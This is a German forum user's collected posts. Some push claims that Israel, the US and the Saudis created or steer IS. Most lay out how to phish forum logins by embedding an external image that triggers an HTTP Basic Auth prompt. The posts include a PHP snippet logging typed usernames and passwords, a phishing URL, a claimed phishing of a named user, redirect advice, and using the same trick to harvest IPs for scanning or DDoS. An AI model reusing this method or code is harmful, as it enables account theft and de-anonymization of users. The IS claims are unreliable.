Beiträge von Doberman

Zitat von ferruminique

@ brutus
Dein Verschwörungsgeschwurbel regt allenfalls zum Schmunzeln an. Israel kann daran kein Interesse haben. Es hatte sich mit Assad längst arrangiert, er war berechenbar im Gegensatz zur Irssis...

Hatte! Bis man sich entschieden hat, Assad zu beseitigen. Syrien und Assad waren den Israelis schon immer ein Dorn im Auge. Nicht nur wegen Syriens Nähe zum Iran und Libanon, auch wegen den Golanhöhen. Man hat nur den richtigen Zeitpunkt abgepasst. Geht Syrien den Bach runter, können die Israelis den Golan behalten ohne auch nur einen Finger zu krümmen. Nagut, Bibi musste mal ein paar Jihadis im Krankenhaus besuchen aber das war's auch schon

Syrian rebel leader thanks PM for standing by wounded
Netanyahu’s decision to speak at Golan field hospital ‘appreciated,’ Istanbul-based opposition official tells Israeli radio
http://www.timesofisrael.com/s…-for-standing-by-wounded/

PS: Ich zucke nach dem Absenden immer noch zusammen und schaue mich um, ob der Nilpferd-Killer naht. Muss mich erstmal dran gewöhnen

Wer sich für die Aktionen und Kriege der Israelis und Amerikaner interessiert

Zitat von Alfred

Die ganz spannenden Fragen sind:

- Wem nutzt der IS?

denjenigen, die die Levante destabilisieren wollen. Das sind aktuell die Saudis , die Israelis und die Amerikaner.
Levante = das fruchtbare Gebiet vom Mittelmeer bis Irak, über Libanon, Syrien usw.

Die Saudis, weil sie den schiitischen Einfluss eindämmen wollen
Die Israelis, weil sie keine starken Nationalstaaten als Nachbarn wünschen, die lassen sich schwerer kontrollieren
Die Amis um die Ressourcen da unten zu sichern.

Zitat von Alfred

- Wer finanziert den IS?

Angeblich die Saudis und die Türken. Und die Eigenfinanzierung durch Steuern, Ölverkauf, usw

Zitat von Alfred

- Wer schuf den IS?

Angeblich schuf sie sich selbst. Ehemalige Widerstandskämpfer des Irak, ehemalige Baath-Führer (sozialistische arabische Partei, wie in Syrien) des Irak. Dazu kommt das Fußvolk, was aus ehemaligen Jihadgruppen(Al Nusra usw) rekrutiert wird. Der plötzliche Erfolg der IS 2014 ist meines Erachtens einer großen Kampagne der Amerikaner oder Israelis zu verdanken. Ich gehe davon aus, dass hochrangige irakische Offiziere bestochen wurden. Die irakische Armee räumte das Feld, hinterließ die ganze Hightech-Ausrüstung die sie von der Amerikanern gekauft hatten. Angebliche sind tausende Soldaten zur IS übergelaufen.

Das die Israelis involviert sind, ist für mich keine Frage. Sonst würden die nicht seelenruhig beobachten wie dieses riesige Jihad-Monster vor der eigenen Haustür wütet. Es geht soweit, dass der syrisch/israelische Grenzübergang unter den Augen der IDF von den Jihadis übernommen wurde.

Das nur mal kurz umrissen.

Welche Frage sich mir stellt. Wenn die IS wirklich von ehemaligen irakischen Offizieren und Baath-Mitgliedern gegründet wurde. Wieso dann dieses grausame Vorgehen. Diese Offiziere sind doch gebildete Leute, das waren keine Hardcore-Islamisten.

Zitat von Wuffi

Aber dass du die Landung unseres Kugelfliegers in diesem Thread erwähnst, brachte mich auf die Idee, ihm das hier: http://politikarena.uphero.com/login.php verpackt in einem IMG-Tag per PN zu schicken. Mal sehen ob er anbeißt.

Du solltest eine Weiterleitung/Redirect ins Script einbauen, so dass er zur PA Startseite weitergeleitet wird.

Der Freak ist zurück. Und dabei war es schon fast angenehm in der Arena die letzten Wochen

Zitat von Wuffi

Sehr schön!
Meine Variante ist Copy&Paste, aus Code-Samples aus dem PHP-Manual zusammengestückelt.

Hast Du nix zu tun?

Verbesserungsvorschlag: Es geht auch mit 5 Zeilen ohne eigene Datenbank

Zitat

header('WWW-Authenticate: Basic realm="politikpla.net"');
header('HTTP/1.0 401 Unauthorized');
$handle = fopen("user.log", "a");
fwrite($handle,$_SERVER['PHP_AUTH_USER'] . ': ' . $_SERVER['PHP_AUTH_PW'].'\n' );
fclose($handle);

@Admin. Ist der Strang öffentlich?

Zitat von Wuffi

Hier: http://politikarena.uphero.com/login.php

... speichert die Login-Daten in einer MySQL-Tabelle.
Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698

Zitat von Alfred

Indem er seine admin Anmeldeinformationen an unbefugte weiter gab, die darauf hin vertrauliche Informationen des Forums dazu nutzten,
den Betreiber zu erpressen und zu diskreditieren.

Ein sehr feiner Zug. Ich frage mich, wie man nach solch einer Nummer dem Herren noch mal zum Mod befördern kann.

Zitat von Alfred

Wie soll das gehen?

Na ja, er war Admin im DF und hatte seine Vertrauensstellung missbraucht.

Inwiefern?

Zitat von Onkel Jo

Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.

Selbst kann man nicht viel machen. Folgender Tipp für User. In der PA schalte ich den Editor auf Quelltext Mode. Somit sehe ich beim Antworten oder Zitieren zumindestens, wenn jemand externe Bilder einbaut. Und man erkennt, woher diese Bilder kommen. Wenn mir die URL "spanisch" vorkommt, lösche ich das Bild beim Zitieren. Toller Nebeneffekt. Man lernt einiges über die Nutzer. Der Doc z.B. baut gerne Smilies aus einem anderen Forum ein. Und zwar aus einem Seglerforum. Da scheint sich also jemand für's Segeln zu interessieren. Narrthan hat übrigens dasselbe Hobby, wie er mal schrieb! Welch ein Zufall

Was den serverseitigen Schutz betrifft, sehe ich nur 2 Möglichkeiten.

Entweder eine Blacklist mit erlaubten Image-Quellen(Bildhoster, Soziale Netzwerke und Medienseiten)
Oder aber man erweitert das Forum insofern, dass jedes Bild vor der Ausgabe auf den Statuscode gecheckt wird.(404, 401 usw). Das liesse sich sicherlich mit ein paar Zeilen Code realisieren. Allerdings bräuchte man da einen eigenen Server, wegen der zusätzlichen Last.

Zitat von Onkel Jo

Stimmt, per Dyn-DNS.

Jetzt haben wir hier ja fast ein vollständiges Tutorial fürs ForenAccount-Phishing gebastelt.

Genau das war der Grund für meine initiale Druckserei.

Vielleicht sollten wir nun auch schreiben, wie man sich und das Forum davor schützen kann

Zitat von Alfred

Es ist aber blind, d.h. ich kann nichts damit anfangen.
Wenn ich die IP Adressen der Nutzer sehen will brauche ich nur in "wer ist online" gehen.

Das hier ist nur ein Verweis auf die PA Seite.

Völlig richtig. Und jetzt tausche einfach die PA URL mit der URL Deines Webserver aus.

Zitat von Onkel Jo

Hättest mal vorher das Stichwort "Phishing" erwähnt, hättest du weniger Verwirrung erzeugt.
Diese Methode ist aber auch nicht "jedermanns" Ding, da der Herr Jedermann dafür einen eigenen Webserver braucht, den er dergestalt konfigurieren kann, dass er den User-Input der HTTP-Authentifizierung mitloggt.

1. Kann man solche Webserver auf seinem Rechner installieren und per Gratisdienste im Web verfügbar machen
2. Stehen diese Angaben im Klartext ohne spezielle Konfiguration zu Verfügung. Man muss sie allerdings abfragen. Insofern hast Du recht.

HEHE

Zitat von Alfred

Theoretisch geht das.
Doch man müsste dann erstens die Datei Index.htm oder besser Index.php in eine HTACCESS Abfrage verwandeln und dann auf den Rechner (Forenserver) in das richtige Verzeichnis (meist HTML) abladen.

Das ist aber nicht so einfach, wenn man nicht vorher die Zugangsdaten gehackt und sich einen FTP Zugang verschafft hat.

Du hast es immer noch nicht verstanden oder Die htaccess Abfrage kommt nicht vom Forum, sondern von dem Bild. Teste es aus. Poste hier eine Antwort mit einem Bild, das als Quelle die PA URL hat. Und mir nix Dir nix, erscheint die Passwortabfrage der PA

Zitat von Alfred

Na ja, mit Jewrassig hat tabasco ja einen unredlichen Admin in ihren Reihen, der das ohne hacken bewerkstelligen könnte, die
kriminelle Energie hat er ja schon im alten DF unter Beweis gestellt.

Erzähl mal.

Zitat von Alfred

Na ja, dass ist jetzt aber eine andere Baustelle und hat mit der Umleitung unserer Seite nichts zu tun.

Zu einer DDOS Attacke müssten tausende von Bot Computern (sog. Zombi Rechner) dazu gebracht werden unseren Rechner anzusteuern, mit dem Resultat, dass der Verkehr
so hoch wird, dass der Server zusammenbricht.
In dem alten DF ist das mal passiert aber es waren nur so an die 50 PCs, dass habe ich sogar noch manuell mit IP Sperren hingekriegt.
Hat ungefähr 2 Stunden Fleisarbeit und spätes Zubettgehen erfordert.

So einfach ist das nicht und wenn ich schon diesen Aufwand betreibe und ein Botnetz von tausenden von Zombies zu erschaffen, dann hetze ich die nicht auf das DF, sondern auf wirklich interessante Server (ohne uns jetzt zu nahe zu treten), z.B. die Lügenrechner der westlichen "Qualitätsmedien".

Alles anzeigen

Wir reden hier von 2 unterschiedlichen Geschichten.

Die eine Sache ist das Provozieren einer htaccess Eingabemaske in einem Strang. Was kann ich damit erreichen.
1. Den Forenbetrieb stören, in dem ich jeden Strang mit htaccess Eingabe Aufforderungen zupflastere.
2. Zugangsdaten abgreifen. Wir wir oben lesen konnten, haben die Benutzer der PA ohne nachzudenken ihre Forum Zugangsdaten in eine unerwartete htaccess Maske eingegeben.

Um so eine htaccess Maske zu provozieren, muss ich weder den Server hacken, noch irgendwelche Angriffe starten. Die Sache ist viel banaler. Der Editor.
Der Forum-Editor lässt das Einbinden von externen Inhalten zu. Und genau das ist der Knackpunkt. Somit kann jeder Depp, ja auch ein Opa Hoppenstedt z.b. ein Bild oder ein Video einbinden, dass nicht auf dem Forumserver liegt. Wenn der Opa jetzt noch Zugriff auf einen Webserver hat, kann er sein Bild htaccess schützen und jeder Besucher des Strang bekommt die htaccess Abfrage, gibt seine Daten ein, weil er denkt die Abfrage kommt vom Forum und gut ist. Der Opa sitzt am anderen Ende der Leitung und sieht den Usernamen + Passwort im Klartext. Was er mit diesen dann anstellen kann,muss ich nicht erklären, das hat uns Riddick in der PA ausführlich geschildert.

Die 2. Sache ist das Sammeln der IP Adressen
Mit der selben Methode kann ich auch die IP Adresse der Nutzer auslesen. Nur lasse ich diesmal natürlich die PW Abfrage weg. Der USer soll es ja nicht merken. Jeder der das Bild aufruft, hinterlässt seine IP Adresse, die URL und einen Zeitstempel auf dem Server vom Hoppenstedt. Der schaut jetzt im Forum nach, wer um 15:30 im Strang XY geantwortet hat und hat somit die IP eines Users. Damit kann er den Rechner des Users nach z.B. Sicherheitslücken, freien Ports usw scannen. Für einen DDOS Angriff auf einen privaten Rechner hinter einer DSL Leitung riechen meines Erachtens 5 Rechner mit der richtigen Software aus. Bein einem richtigen Webserver brauch man ein paar tausend, da hast Du recht. Der Provider ist ja mit entsprechenden Sicherheitsmaßnahmen geschützt.

PS: Wer es mal testen will
Schickt euch selber eine private Nachricht. Fügt ein Bild ein und gebt die URL der PA als Bildquelle an.
http://www.politikarena.net/index.php

Zitat von Alfred

Wozu soll das gut sein?

Naja, in der PA z.B. hat ein User versucht darüber die Standorte der Nutzer zu lokalisieren. Das wurde dann weitergereicht an die "Freunde".

Leute die etwas von verstehen, können mit Hilfe der IP wesentlich leichter dein Rechner hacken. Im Übrigen auch mit kleineren DDos Attacken

Zitat von Alfred

Du meinst die IP unserer Seite?
Ja, die kriegt man leicht raus.
Dann müsste man aber den oder die DNS Server manipulieren, die unsere IP auf deutschlandforum.cc transformieren.
Das kann nicht jeder.

Nein, die IP's der Nutzer. Also Deine, Meine usw

Zitat von Alfred

Dann müsste er in der Lage sein unseren Server zu hacken.

Nee, dazu muss man kein Hacker sein, dass ist ja das perfide. Wie oben nachträglich geschrieben. Man kommt so auch an die IP's ran und kann sie per Zeitstempel dem Nutzer zuordnen.

Zitat von Alfred

Dann müsste er in der Lage sein unseren Server zu hacken.

Eben nicht. Es geht auch ohne. Selbst die IP's der Nutzer lassen sich auslesen

Zitat von Alfred

Wie willst Du Seite auf unsere Foren URL umleiten?

Soll ich das wirklich erklären?

Zitat von Onkel Jo

Nur von Leuten, die entsprechenden Zugriff auf den Webserver haben.
Oder durch DNS-Spoofing und ähnliche Schweinereien. Ist aber nicht trivial.
Also "jedermann" ist schon etwas übertrieben.

Da unterliegst Du einem Irrtum. Eine Eingabeaufforderung kann jedermann provozieren und entsprechend Daten abgreifen. Dauert 20 Sek. Hab es eben getestet.